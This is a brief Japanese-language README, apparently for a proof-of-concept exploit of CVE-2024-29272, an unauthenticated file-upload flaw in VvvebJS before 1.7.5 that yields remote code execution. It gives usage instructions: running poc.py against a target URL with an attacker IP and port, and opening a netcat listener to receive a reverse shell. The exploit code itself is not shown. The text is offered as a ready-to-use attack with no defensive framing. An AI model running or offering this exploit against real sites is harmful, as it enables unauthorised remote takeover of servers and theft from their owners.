
CVE-2024-29272の概念実証エクスプロイト。VvvebJS < 1.7.5における未認証の任意ファイルアップロード脆弱性で、リモートコード実行を可能にします。
これはCVE-2024-29272のProof-of-Conceptです。VvvebJS < 1.7.5のバージョンでリモートコード実行につながる、認証不要の任意ファイルアップロード脆弱性です。
使用方法:
python3 poc.py -u <URL> -l <ATTACKER IP> -p <ATTACKER PORT>
別のターミナルで:
nc -lvnp <ATTACKER PORT>